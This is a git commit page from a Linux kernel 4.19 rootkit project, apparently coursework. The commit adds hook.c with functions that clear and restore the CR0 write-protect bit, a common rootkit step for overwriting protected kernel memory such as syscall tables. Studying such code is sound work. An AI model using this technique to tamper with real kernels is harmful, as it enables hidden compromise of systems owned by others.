adds initial hooks code - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit c8017b40cad263e1f9afe9c8a7620499f3fa5e23
parent 903ef79c132e3a913ee1873cea51522413c18445
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 20 Nov 2020 16:59:10 +0100

adds initial hooks code

Diffstat:
A src/hook.c  | 16 ++++++++++++++++
A src/hook.h  | 8 ++++++++

2 files changed, 24 insertions(+), 0 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -0,0 +1,16 @@
+#include <linux/kallsyms.h>
+
+#include "hook.h"
+
+
+void
+disable_protection(void)
+{
+	write_cr0(read_cr0() & (~0x10000));
+}
+
+void
+enable_protection(void)
+{
+	write_cr0(read_cr0() | 0x10000);
+}
diff --git a/src/hook.h b/src/hook.h
@@ -0,0 +1,8 @@
+#ifndef _GROUP7_HOOK_H
+#define _GROUP7_HOOK_H
+
+void disable_protection(void);
+void enable_protection(void);
+
+
+#endif//_GROUP7_HOOK_H

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs